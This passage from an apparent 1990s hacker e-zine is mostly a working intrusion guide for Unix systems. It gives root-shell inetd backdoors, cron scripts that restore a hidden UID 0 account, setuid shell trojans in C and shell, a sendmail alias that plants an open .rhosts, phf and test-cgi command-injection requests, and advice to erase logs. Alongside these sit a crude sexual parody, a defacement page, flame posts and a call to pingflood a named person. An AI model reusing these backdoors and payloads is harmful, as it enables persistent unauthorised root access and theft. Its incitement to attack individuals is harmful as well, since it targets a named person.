network mail protocol NeWS 144/tcp news # Window System snmp 161/udp Notice the suled service...that I added that to the /etc/services. Ok, now to the /etc/inetd.conf file: ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd gopher stream tcp nowait root /usr/sbin/tcpd gn ...Here we go!! ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd gopher stream tcp nowait root /usr/sbin/tcpd gn suled stream tcp nowait root /bin/sh sh -i Ok, now restart inetd like i said how to before... You're all set, telnet localhost <port u set> and test it!@~# Backdoor II: Da beauty of CRON ------------------------------- Ok, cron trojans are good for keeping root if the admin kills the backdoor. A Cron is a timed daemon. It consits of hours, minutes, etc. It will make the system automatically issue a command on the shell at a given time of your choice... Type crontab in the shell. It will tell you how to list, run and remove crons. You will like to look at the /var/spool/cron/crontabs/root. This is what the crons will look like: 0 0 * * 1 /usr/bin/updatedb [1] [2] [3] [4] [5] [ 6 ] 1: munute, 0-59 2: hour, 0-23 3: day of month, 1-31 4: month of yeat, 1-12 5: day of week, 0-6 6: command to execute The example above is issued on monday's. If you want to exploit the cron, simply add an cron line to the /var/spool/crontab/root. ie: If you use the UID 0 account (as seen later), you can make a cron to see if the UID 0 account is still alive. If root killed it, the cron can re-add it! ...This will make the UID 0 account, just for back-up: Cron #1 ------- newuser.sh ---------- #!/bin/sh # Inserts a UID 0 account into the middle of the passwd file. # There is likely a way to do this in 1/2 a line of AWK or SED. Oh well. # daemon9@netcom.com set linecount = `wc -l /etc/passwd` cd # Do this at home. cp /etc/passwd ./temppass # Safety first. echo passwd file has $linecount[1] lines. @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files echo Creating two files, $linecount[1] lines each $or approximately that$. split -$linecount[1] ./temppass # passwd string optional echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... *** NOTE : MODIFY THE ECHO "YOURUSER..." PART!! Here is a script that kinda does the same thing, but instead of making a new account, it will look for an old, disabled account and enable it just for you : dead.sh ------- #!/bin/sh # Everyone's favorite... cp /bin/csh /tmp/.yourlittleshell # Don't name it that... chmod 4755 /tmp/.yourlittleshell Ok, here is where the cron comes in. It will look in the passwd files to check if you YouUser is still alive. If not, it brings him back! revive.sh --------- #!/bin/sh #Is YourUser still on the system? Let's make sure he is. #daemon9@netcom.com set evilflag = (`grep eviluser /etc/passwd`) if($#evilflag == 0) then # Is he there? set linecount = `wc -l /etc/passwd` cd # Do this at home. cp /etc/passwd ./temppass # Safety first. @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files split -$linecount[1] ./temppass # passwd string option echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... else endif cron #2 ------- First of all, you will need a copy of the /etc/passwd file in a hidden location. For this example, we will use /var/spool/mail/.hidepass. We have one entry in it that will be are root account we will use. Then lets make a cron that will save a copy of the real /etc/passwd file and install the hidden passwd file as the real one for 1 minute at a time of your choice. Make it at a slow time of day because any one who tries to access the passwd file durring this minute will get an error. 4:30 am is a good time. Put this in the roots cron to do this : 29 4 * * * /bin/usr/hidenhidenpass ..make sure this exist #echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidden here is the /bin/usr/hidenhidenpass .hidden ------- #!/bin/sh # Install trojan /etc/passwd file for one minute #daemon9@netcom.com cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd Cron #3 -------- This is a c script that will work like the above. Cron it as root like as above and just let this file load every day. hidden.c -------- #include<stdio.h> #define KEYWORD "industry3" #define BUFFERSIZE 10 int main(argc, argv) int argc; char *argv[];{ int i=0; if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYWORD,argv[1]))){ /* This is the trojan part. */ system("cp /bin/csh /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); } } /* Put your possibly system specific trojan messages here */ /* Let's look like we're doing something... */ printf("Sychronizing bitmap image records."); /* system("ls -alR / >& /dev/null > /dev/null&"); */ for(;i<10;i++){ fprintf(stderr,"."); sleep(1); } printf("\nDone.\n"); return(0); } /* End main */ ============================================================================= section 5: ============================================================================= Sendmail backdoor : ------------------- With this, you have to edit the /etc/aliases file. add this line: decode: |/usr/bin/uudecode make sure u hide it in their so it aint odvious :). the uudecode file will be a .rhosts file with the full pathname embedded. here is the script: uudecode.sh ----------- #!/bin/sh # Create our .rhosts file. Note this will output to stdout. echo "+ +" > tmpfile /usr/bin/uuencode tmpfile /root/.rhosts Ok, now telnet to victumserver.com at port 25. Fakemail to decode and use as the subject body, the uuencoded version of the .rhosts file. Here is an easy one (but not fake): echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victimserver.com You can add any program that I have listed to be ran from the alias, so be as creative as u want! :) ============================================================================= section 6: ============================================================================= Others : Here is one of the best trojans I have seen. It is sneeky and only detectable by programs like tripwire. All you have to do is put the trojan code into a the source of some popular system programs. su, login, and passwd are very good to add it to because they run a SUID root and don't have strict permission so you can modify it. This will tell you what to do after u get the source code for the particular UNIX system you are backdooring. If you can't get the source for any programs on your system, u may be screwed :(. You can find trojaned versions of many programs, here is a small example of pseudo-code that is added in such programs... get input; if input is special hardcoded flag, spawn evil trojan; else if input is valid, continue; else quit with error; ... ============================================================================= section 7: ============================================================================= Keeping the backdoor : Well, the best advice I can possibly give to start off is to cover your tracks. If the admin doesn't know he's been hacked, he won't look for backdoors to remove. This will totaly depend on the admins ability to find backdoors and know how to get rid of them. ─────────────────────────────────────────────────────────────────────────────── 6. One Last Thing About The Infamous pHf Technique : so1o ─────────────────────────────────────────────────────────────────────────────── You can use this basic form of attack...[Thru NutScrape For Example] http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd [ 1 ][ 2 ][ 3 ][ 4 ][5][ 6 ] 1: The Target Site. 2: The pHf Command. 3: The Magic pHf Arguments. 4: The Program You Wish To Run. 5: %20 Is A Space, so %20%20%20 == 3 Spaces. 6: The Arguments You Wish To Use. Here Are Some Other Examples... ------------------------------- http://www.site.com/cgi-bin/phf?Qalias=x&0a/bin/ls%20-la%20/etc/ ...This will list the files in the /etc/ directory. http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/uname%20-a ...This will display the operating system. Remember : You execute the commands with pHf as the user nobody, so you can't shutdown the system, echo "+ +" >> /.rhosts etc. etc. All the stuff you throw at the system using phf will be logged too, so if you do decide to hack the system, remember to kill the logs when you get root :) ─────────────────────────────────────────────────────────────────────────────── 7. Test-cgi holes : so1o ─────────────────────────────────────────────────────────────────────────────── Example exploit: ---------------- Below are examples, nc is netcat from avian.org. You can always just telnet to port 80 and type in the GET... command. machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80 CGI/1.0 test script report: argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root /sbin /stand /sys /tmp /usr /usr2 /var REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = ...Or to see what other cgi-goodies are still floating around... machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80 CGI/1.0 test script report: argc is 1. argv is \*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html mail-query mail-query-2 majordomo majordomo.cf marker.cgi menu message.cgi munger.cgi munger.note ncsa-default.tar post-query query smartlist.cf src subscribe.cf test-cgi uptime REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = ─────────────────────────────────────────────────────────────────────────────── 8. Tree raping : digitalboy [DD] ─────────────────────────────────────────────────────────────────────────────── Tree raping can be an exciting and fulfilling hobby, as long as the proper safety precautions are taken. This file will try to outline the process of tree raping, as well as give you some background on the sport of tree raping. \|/ History \|/ Tree raping originated in Eastern Africa long before history was recorded. It was practiced by tribes of natives who used it as a test to determine the tribal chief. He who could rape the most trees was surely the most powerful, and therefore the rightful leader. The sexual molestation of trees was kept a tribal secret, and no outsiders learned of the practice until the late 1800's when Spanish explorer Hernando Ferdinando Enriquez happened to witness the event. He was killed by the natives he had been watching, but before his death he wrote of it in his journal. In 1937, a nun found the journal and the methods of tree raping were spread to the rest of the civilized world. \|/ Preparation \|/ Tree raping is not something you can just go out and do. You must be prepared. First and foremost, find a forest. While some of the best trees are found in urban settings, violating them will usually land you in the city jail. Not to mention the public ridicule. No, this is an activity that must take place in a relatively secluded part of a forest. Bring a few friends if that is your fancy, but large tree raping orgies usually lessen the enjoyment. You must also bring a large vat of maple syrup and possible climbing equipment, this will be explained later. \|/ Tree Selection \|/ Picking the right tree to violate is essential. If you pick the wrong tree, you could end up feeling inadequate, as well as inflicting serious physical injury upon yourself. Everyone has their own preference as to what type of tree to choose, but there are some general guidelines. The most vital factor you have to consider is the position of knotholes. If a knothole is not present, you may be forced to create your own. Any seasoned tree rapist always carries his trusty power drill. Also, be sure to measure the depth of the knothole. The texture of the bark is also important. Extremely rough bark can ruin your experience. Try to find a tree with smooth bark, such as a birch. Note that you are not limited to the part of the tree at ground level. Bring some climbing equipment and you can easily reach the desired level. \|/ The Act Of Tree Raping \|/ Tree raping always has and always must be done in complete nudity. Now, remember that you were required to bring along a vat of maple syrup. This object will now come into play. First, heat it to exactly 54.7 degrees Celsius. Next lift the syrup over your head and pour it over your body. Count to 112, then lie down and roll around on the forest floor. You are now ready to begin the ritual. Approach the tree you have picked while screaming "TSAK NARP FNORZA QKWT" as loud as possible. Penetrate the tree and proceed to violate it. Try to keep moving, the maple syrup can be a powerful bonding agent. When you are finished you will have to find your own method of removing the maple syrup. \|/ The End \|/ Avoid Pine trees AT ALL COSTS! ─────────────────────────────────────────────────────────────────────────────── 9. .htpasswd + .htaccess : Cain [DD] ─────────────────────────────────────────────────────────────────────────────── Well, I'm back. I should have put this article out last month, but I neglected to. Flames to /dev/null. Well anyway, you know how sometimes when you connect to a web page, you are asked for a username and password? Well, here's how that works. In a directory there is a file almost always called .htpasswd. And in another directory(or possibly that same one) there is a file called .htaccess. The .htpasswd file follows basically the same format as the /etc/passwd file: jblow:F#.DG*m38d%RF cain:GJA54j.3g9#$@f and the .htaccess file follows this format: AuthUserFile /path/to/.htpasswd <LIMIT GET PUT POST> require user <user> </LIMIT> If there is an .htaccess file in a directory, you must have a valid username and password to view any files in that directory. So here is what happens, the httpd sees the .htaccess file in the directory that you request a file from. It finds the location of the .htpasswd file and then find out who has access to the files in the directory. Therefore you must have a username and password. Well here's the bug: Only the files in the directory with the .htaccess file are passworded. So if the .htpasswd file is somewhere else (root directory maybe) then you can read that file. It uses the same form as /etc/passwd so therefore password crackers will work on this also. Insta hack if the webmaster doesn't know what he's doing. ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. Some History : nobody ─────────────────────────────────────────────────────────────────────────────── Electronic doom will soon be visited on U.S. computer networks by information warriors, hackers, pannational groups of computer-wielding religious extremists, possible agents of Libya and Iran, international thugs and money-mad Internet savvy thieves. John Deutch, director of Central Intelligence, testified to the truth of the matter, so it must be graven in stone. In a long statement composed in the august tone of the Cold Warrior, Deutch said to the Senate Permanent Subcommittee on Investigations on June 25, "My greatest concern is that hackers, terrorist organizations, or other nations might use information warfare techniques" to disrupt the national infrastructure. The lack of solid evidence for any of the claims made by the intelligence community has created an unusual stage on which two British hackers, Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous show to demonstrate the threat of information warfare to members of Congress. Because of a break-in at an Air Force facility in Rome, NY, in 1994, booth hackers were made the stars of two Government Accounting Office reports on network intrusions in the Department of Defense earlier this year. The comings and goings of Datastream Cowboy also constitute the meat of Gelber and Christy's minority staff report from the Subcommittee on Investigations. Before delving into it in detail, it's interesting to read what a British newspaper published about Datastream Cowboy, a sixteen year-old, about a year before he was made the poster boy for information warfare and international hacking conspiracies in front of Congress. In a brief article, blessedly so in contrast to the reams of propaganda published on the incident for Congress, the July 5 1995 edition of The Independent wrote, "[Datastream Cowboy] appeared before Bow Street magistrates yesterday charged with unlawfully gaining access to a series of American defense computers. Richard Pryce, who was 16 at the time of the alleged offences, is accused of accessing key US Air Force systems and a network owned by Lockheed, the missile and aircraft manufacturers." Pryce, a resident of a northwest suburb of London did not enter a plea on any of 12 charges levied against him under the British Computer Misuse Act. He was arrested on May 12, 1994, by New Scotland Yard as a result of work by the U.S. Air Force Office of Special Investigations. The Times of London reported when police came for Pryce, they found him at his PC on the third floor of his family's house. Knowing he was about to be arrested, he "curled up on the floor and cried." In Gelber and Christy's staff report, the tracking of Pryce, and to a lesser extent a collaborator called Kuji -- real name Mathew Bevan, is retold as an eight page appendix entitled "The Case Study: Rome Laboratory, Griffiss Air Force Base, NY Intrusion." Pryce's entry into Air Force computers was noticed on March 28, 1994, when personnel discovered a sniffer program he had installed on one of the Air Force systems in Rome. The Defense Information System Agency (DISA) was notified. DISA subsequently called the Air Force Office of Special Investigations (AFOSI) at the Air Force Information Warfare Center in San Antonio, Texas. AFOSI then sent a team to Rome to appraise the break-in, secure the system and trace those responsible. During the process, the AFOSI team discovered Datastream Cowboy had entered the Rome Air Force computers for the first time on March 25, according to the report. Passwords had been compromised, electronic mail read and deleted and unclassified "battlefield simulation" data copied off the facility. The Rome network was also used as a staging area for penetration of other systems on the Internet. AFOSI investigators initially traced the break-in back one step to the New York City provider, Mindvox. According to the Congressional report, this put the NYC provider under suspicion because "newspaper articles" said Mindvox's computer security was furnished by two "former Legion of Doom members." "The Legion of Doom is a loose-knit computer hacker group which had several members convicted for intrusions into corporate telephone switches in 1990 and 1991," wrote Gelber and Christy. AFOSI then got permission to begin monitoring -- the equivalent of wiretapping -- all communications on the Air Force network. Limited observation of other Internet providers being used during the break-in was conducted from the Rome facilities. Monitoring told the investigators the handles of hackers involved in the Rome break-in were Datastream Cowboy and Kuji. Since the monitoring was of limited value in determining the whereabouts of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence network of informants, i.e., stool pigeons, that 'surf the Internet.' Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from Britain. The anonymous source said he had e-mail correspondence with Datastream Cowboy in which the hacker said he was a 16-year old living in England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also apparently ran a bulletin board system and gave the telephone number to the AFOSI source. The Air Force team contacted New Scotland Yard and the British law enforcement agency identified the residence, the home of Richard Pryce, which corresponded to Datastream Cowboy's system phone number. English authorities began observing Pryce's phone calls and noticed he was making fraudulent use of British Telecom. In addition, whenever intrusions at the Air Force network in Rome occurred, Pryce's number was seen to be making illegal calls out of Britain. Pryce travelled everywhere on the Internet, going through South America, multiple countries in Europe and Mexico, occasionally entering the Rome network. From Air Force computers, he would enter systems at Jet Propulsion Laboratory in Pasadena, California, and the Goddard Space Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins and passwords of the Air Force networks in Rome, he was then able to get into the home systems of Rome network users, defense contractors like Lockheed. By mid-April of 1994 the Air Force was monitoring other systems being used by the British hackers. On the 14th of the month, Kuji logged on to the Goddard Space Center from a system in Latvia and copied data from it to the Baltic country. According to Gelber's report, the AFOSI investigators assumed the worst, that it was a sign that someone in an eastern European country was making a grab for sensitive information. They broke the connection but not before Kuji had copied files off the Goddard system. As it turned out, the Latvian computer was just another system the British hackers were using as a stepping stone; Pryce had also used it to cover his tracks when penetrating networks at Wright-Patterson Air Force Base in Ohio, via an intermediate system in Seattle, cyberspace.com. The next day, Kuji was again observed trying to probe various systems at NATO in Brussels and The Hague as well as Wright-Patterson. On the 19th, Pryce successfully returned to NATO systems in The Hague through Mindvox. The point Gelber and Christy seem to be trying to make is that Kuji, a 21-year old, was coaching Pryce during some of his attacks on various systems. By this point, New Scotland Yard had a search warrant for Pryce with the plan being to swoop down on him the next time he accessed the Air Force network in Rome. In April, Pryce penetrated a system on the Korean peninsula and copied material off a facility called the Korean Atomic Research Institute to an Air Force computer in Rome. At the time, the investigators had no idea whether the system was in North or South Korea. The impression created is one of hysteria and confusion at Rome. There was fear that the system, if in North Korea, would trigger an international incident, with the hack interpreted as an "aggressive act of war." The system turned out to be in South Korea. During the Korean break-in, New Scotland Yard could have intervened and arrested Pryce. However, for unknown reasons, the agency did not. Those with good memories may recall mainstream news reports concerning Pryce's hack, which was cast as an entry into sensitive North Korean networks. It's worth noting that while the story was portrayed as the work of an anonymous hacker, both the U.S. government and New Scotland Yard knew who the perpetrator was. Further, according to Gelber's report English authorities already had a search warrant for Pryce's house. Finally, on May 12 British authorities pounced. Pryce was arrested and his residence searched. He crumbled, according to the Times of London, and began to cry. Gelber and Christy write that Pryce promptly admitted to the Air Force break-ins as well as others. Pryce confessed he had copied a large program that used artificial intelligence to construct theoretical Air Orders of Battle from an Air Force computer to Mindvox and left it there because of its great size, 3-4 megabytes. Pryce paid for his Internet service with a fraudulent credit card number. At the time, the investigators were unable to find out the name and whereabouts of Kuji. A lead to an Australian underground bulletin board system failed to pan out. On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew Bevan -- a computer technician, had been arrested and charged in connection with the 1994 Air Force break-ins in Rome. Rocker Tom Petty sang that even the losers get lucky some time. He wasn't thinking of British computer hackers but no better words could be used to describe the two Englishmen and a two year old chain of events that led to fame as international computer terrorists in front of Congress at the beginning of the summer of 1996. Lacking much evidence for the case of conspiratorial computer-waged campaigns of terror and chaos against the U.S., the makers of Congressional reports resorted to telling the same story over and over, three times in the space of the hearings on the subject. One envisions U.S. Congressmen too stupid or apathetic to complain, "Hey, didn't we get that yesterday, and the day before?" Pryce and Bevan appeared in "Security in Cyberspace" and twice in Government Accounting Office reports AIMD-96-84 and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace" and the Air Force Office of Special Investigations' source for the Pryce case supplied the same tale for Jack Brock, author of the GAO reports. Brock writes, ". . . Air Force officials told us that at least one of the hackers may have been working for a foreign country interested in obtaining military research data or areas in which the Air Force was conducting advanced research." It was, apparently, more wishful thinking. This years UK hacking conference : Access All Areas. http://www.access.org.uk July 5th. ─────────────────────────────────────────────────────────────────────────────── 2. [GUNNAR], MadSeason and sIn : so1o ─────────────────────────────────────────────────────────────────────────────── Some dudes called MadSeason and [GUNNAR] has been proving sIn's true lameness and logging it all at the same time, phear elite logging skills... ################################################################################## # # # Darkfool # # (What a Fool/The PHF hacker) # # BY [GUNNAR] # # # ################################################################################## Ever read a hacking txt by this guy? Ever realize just how useless the information his txt's are? Nothing in his txt files aren't covered in a hundred text files written before which better explain hacking techniques. Like a quote from my pal MadSeason goes: "The fact is these txt files about hacking and phreaking are written by people with minimal knowledge. Then you have some newbie who comes along wanting to be some hacker god and reads a few files and has even less of a clue then the writer had about the subject, then goes around spewing out bullshit and claiming they are a hacker and/or phreaker, just an endless circle of ignorance." That quote is so true. All these hack txt's realeased by these groups like S.I.N. and Techonophoria are just crap. About the only exploit that Darkfool knows the the PHF bug found in older versions of NCSA and Apache httpd. This bug is very well know(And over exploited might I add.). Do a search for ac.jp or edu.au domains, and adding to the address "cgi-bin/phf?Qalias=x%0a/bin/cat%20 /etc/passwd" is neither impressive nor is it even hacking. It's a lame excuse for hacking. Darkfool claims many things that he doesn't know. For instance, take pascal programming. He claims to know it, but when asked a single question on it by, Scorpion(MadSeason), he cannot answer. Here is a little something: [13:53] <Scorpion> How many parameters do Cluster object constructors take in pascal, DF? [13:53] <Darkfool> i have no idea scorpion [13:54] <Scorpion> I thought you knew Pascal [13:54] <Darkfool> i am learning it at college There is a big difference between knowing and learning. I guess Darkfool doesn't realize that. It's all a part of trying to sound and seem "elite". Which Darkfool is far from being. Seems as thought Darkfool and the rest of his S.I.N. pals are compying MadSeason and myself, and questioning peoples abilities. It's funny though, when MadSeason and I got to #sin questioning them, we get kicked for making them look stupid. And when they as us something, and it doesn't go quite as they planned it. Look what they do... [14:14] *** Now talking in #sin [14:15] <Darkfool> hey [14:15] <Darkfool> how do i kill all jobs running on a shell ? <[GUNNAR]> Well hello there! [14:15] <HoMeR> hey <[GUNNAR]> kill -9 PID <[GUNNAR]> If you really wanna kill it. <[GUNNAR]> Boo Hoo. <[GUNNAR]> Damn, that one didn't go well for you did it? <[GUNNAR]> BTW, use the ps command to get the PID. <[GUNNAR]> la la la la... [14:17] *** Sinning sets mode: +b *!*@*.wco.com [14:17] *** You were kicked by Fa|lur3 (banned) In short, Darkfool, S.I.N. and the rest like him are really just wannabes trying to sound big and bad. Nothing wrong with groups or people who actually hack. But, when you have a group like S.I.N. who's members claim more than they know, it is truely sad. I myself and no great hacker(I'm not a hack. Plain and simple.) nor am I some s00per programmer. But the thing is, I do not claim more than I actually know. This is obviously not how Darkfool thinks of things. He wants to be known as a s00per hacker, which he is not. I'm writing this so you(The Readers) don't buy into this bullshit and be misled by people like Darkfool and the group he is in S.I.N.! They are truely sad people. What a shame I have brought out the truth! I think more is somewhere on http://www.ilf.net/teknopia/ ─────────────────────────────────────────────────────────────────────────────── 3. "Welcome to the [D]epartment of [O]wned [E]nergy" : so1o ─────────────────────────────────────────────────────────────────────────────── The http://www.doe.ca (Canadian Dept. of Energy) was changed last weekend... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> <HTML> <HEAD> <TITLE></TITLE> <META NAME="Author" CONTENT="Tetsu Khan"> <META NAME="GENERATOR" CONTENT="Mozilla/3.01Gold (Win95; I) [Netscape]"> </HEAD> <BODY TEXT="#FFFFFF" BGCOLOR="#000000" LINK="#FFFFFF" VLINK="#C0C0C0" ALINK="#FF0000"> <CENTER><TT>Welcome To The [D]epartment of [O]wned [E]nergy</TT></CENTER> <CENTER> <HR WIDTH="100%"></CENTER> <CENTER>You could define this as an act of aggression, or you could define it as us, the hackers (or crackers), just adivising you to try and make it more difficult for us, at least employ consultants etc. who have a CLUE. because one day, in the not so distant future, the internet equivalent of Pearl Harbour will occur, and we will only be around to say "We told you so", until that day, we will keep reminding you, get some security, its better for you, its better for us, its better for everyone.</CENTER> <CENTER>In this case, even though your system runs HP-UX, we advise you still take the time to look into all the exploits that are available for this operating system, and then get over to www.cert.org to find some advisories.</CENTER> <CENTER>This attack was brought to you in association with 0range Amusements.</CENTER> <CENTER><IMG SRC="pac001.gif" HEIGHT=190 WIDTH=175></CENTER> <CENTER>Greets to so1o, helix, xFli, modeX, c0d, xrx, zer0x, organik, phractal chaos and all the usual suspects.</CENTER> <CENTER> <HR WIDTH="100%"></CENTER> <CENTER><TT>In the meantime, maybe you would like to visit...</TT></CENTER> <CENTER><A HREF="http://www.crackhouse.com">The CrackHouse</A></CENTER> <CENTER><A HREF="http://micros0ft.paranoia.com">Micro$oft</A></CENTER> <CENTER><A HREF="http://www.codez.com">The CodeZero</A></CENTER> <CENTER> <HR WIDTH="100%"></CENTER> <CENTER><TT><BLINK>We 0wN j00r EnErGy!@# wE 0wN j00R LiGhTbUlBz!@#~</BLINK></TT></CENTER> </BODY> </HTML> ─────────────────────────────────────────────────────────────────────────────── 4. LOPHT.COM : so1o ─────────────────────────────────────────────────────────────────────────────── Get into any shell, and type... % whois lopht.com ...It's elite (lookup sIn inf0z to see) ─────────────────────────────────────────────────────────────────────────────── 5. AAA Report : so1o ─────────────────────────────────────────────────────────────────────────────── AAA stands for Access All Areas, it is a computer security and hacking conference held in the UK in early July of every year, this would be the third year of AAA, and myself and NightRage were going. Myself and NightRage arrived on Regent Street at 9:30am, we entered the University of Westminster building, purchased two passes for the event, and proceeded to the conference room, where there were many people aged between 16 and around 40, all with a handful of common interests, hacking, phreaking, carding and generally the ability to gain power, or "free stuff". We sat down on the ground floor near the back of the room, we got talking to a french hacker, called Leon (aka acme), we joked about "o-DaY WaReZ" and then Nightrage booted his p150 laptop, then Leon pulled out his Thinkpad, he booted it, and it counted up to 64mb of RAM, we asked how much hard drive space he had to which he casually replied "6 gig", Leon knew stuff. The first speaker was Ross Anderson, who explained how our predecessors had broken into cash machines (atm's) using various techniques, as well as the flaws in such machines and systems, ranging from all cards having the same PIN, to a trick that Shefield hackers used with phone cards to get cash. He then went on to smartcards and encryption and finished around 11am. We then went up to the network room, where the "hack the flag" competition was to be held, there were a handful of people up there, including a photgrapher and some staff, I only saw 3 systems and 2 terminals, not really enough to use for any competition. Leon sat down and started to toy with his laptop and some CD's he had purchased in Pakistan the day before, he had voice recognition programs and games and a few other "expensive" CD's. We met an American wearing an FBI cap, he also had a laptop, as well as another with long blonde / grayish hear who did alot of cool stuff with the phone line in the network room using various toys he had. We needed to set up a network, we had numerous modems, one network hub with 5 ports, around 8 systems and one phone socket. We soon realised through various methods (one using NightRage's cheap blue telephone) that the only phone socket in the room went through the reception, so NightRage phoned down to the reception, and tried to use his amazing social engineering skills.. Reception : "hello?" NightRage : "hi, is there any way I can get an outside line from this phone?" Reception : "no" NightRage : "OK" We then went on a hunt for working phone lines or hubs that we could use to help us set up our network, the FBI dude soon found a cabinet that looked important, and NightRage and the others helped him pick the lock, inside they found a 3com network hub and a few other goodies, the FBI dude got his laptop and tried to hack his way onto the network, but he couldn't use traceroute or any other programs, so that hub was useless to us unless we knew our own IP. Two younger hackers started to manually wardial the extensions, they found a handful of modem numbers in a very short amount of time. We were quite impressed by their skills. The guy with the long blond / grayish hair went down to a computer shop on Regent street to buy some RJ45 cable so we could use the hub in the cabinet, but he left before we realised that it wasn't usable. Emerson was getting really stressed out, as he was one of the staff, and he had promised the University that no damage would be done to any of the phone / computer lines, he needed a plan to stall us, even though we were telling him everything would be fine, and that we would leave all the stuff as it was when we found it, he was still scared at the consequences, and it was time for lunch, we originally planned to just pop over the street to grab a McDonalds, but Emerson started to take us down Regent street, he asked if we wanted to eat for around £5 at a place he knew well, we agreed, the time was around 1pm... Emerson proceeded to take myself, NightRage, the FBI dude, Wyatt and the two that had manually wardialled the extensions half way around London, we walked down Regent street, onto Tottenham court road and around a load of shops, Wyatt and the FBI dude suggested we should grab a beer, and we easily found a pub. We stopped into the pub and all ordered drinks, we then sat outside and talked about the L0phT, global posistioning and scanning, we left the pub at about 2pm and made our way through alot of roads and came to Kamamama's Japanese restaurant, after stopping into alot of shops on the way and talking about oki phones. We ate good Japanese food in Kamamama's, and Wyatt used his tiny scanner to detect radio comms within the building, his scanner was cool, and he tried to pinpoint the frequency that the waiters broadcast the orders with their handheld systems, at one point he placed the scanner right up next to the handheld and said "can you press that button one more time please". Wyatt also had a transciever that he could use to broadcast on, so he could pinpoint a frequency with his scanner, and the broadcast with his tiny transciever on that frequency. The time was now around 3pm, and we made our way back through a very busy London to the conference, when we got back we went back up to the network room, not alot had happened since we had been away (much as Emerson would have expected) and myself and NightRage toyed with systems for about 30 minutes We then listened to another talk by a journalist who often writes of hacking and computer security issues, called Dave Green (I think), Cold-Fire and the people on the balcony often questioned him, and he generally said "no-one cares what you do, so why should I write about it?" which was pretty true, then another journalist went on saying that he would pay for such stories if they had reason behind them (ie. web site attacks), this was quite interesting. The last talk myself and NightRage listened to was Alan Solomon, to which I asked, when he was talking about the Linux version of his toolkit... "Yeah, does the Linux version detect Windoze '95 as a virus?" He didn't understand, but he's cl00less and hangs on AOL all day... He then went on to talk a load of crap about how amazing AOL was, then he talked about how he has been mailbombed and how "phishers" have tried to pull all his account inf0z (passwords etc.) he was also shouting into the microphone, and I had a speaker right next to me, and I had my finger in one ear for most of the talk, due to the fact that he shouted into the microphone, he also breathed very heavily and walked around alot. We went back up to the network room, which now had 2 systems and 2 terminals, swapped email addresses with Wyatt, Emerson, the FBI dude and a few others, we then said our goodbyes, and left to catch the 8:30 train from Paddington Station. AAA was cool, it was just a pity that only one of the three planned special events actually took place, as well as the fact that there really wasn't enough time for the people there to talk with each other. ─────────────────────────────────────────────────────────────────────────────── 6. Lamer of the fucking year : pSId (DALnet) : so1o ─────────────────────────────────────────────────────────────────────────────── Theres a fucking cl00less g1mp on DALnet called pSId, but then again, most people on DALnet are cl00less, this "cracker" however has the following "mad" skills... - phf - tftp His most highly acclaimed hack was of sony.co.jp (guess the technique.) and since then he has blatently lied about hacking bolero.gsfc.nasa.gov (www.nasa.gov alias) which he says runs tftp. If you see him *anywhere* feel free to pingflood his IP, 0wn his lame fuck Linux box, or anything else. ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. STiK : mstrhelix ─────────────────────────────────────────────────────────────────────────────── -=STiK=- (S)olaris (T)ool (i)diot (K)it ****************************** 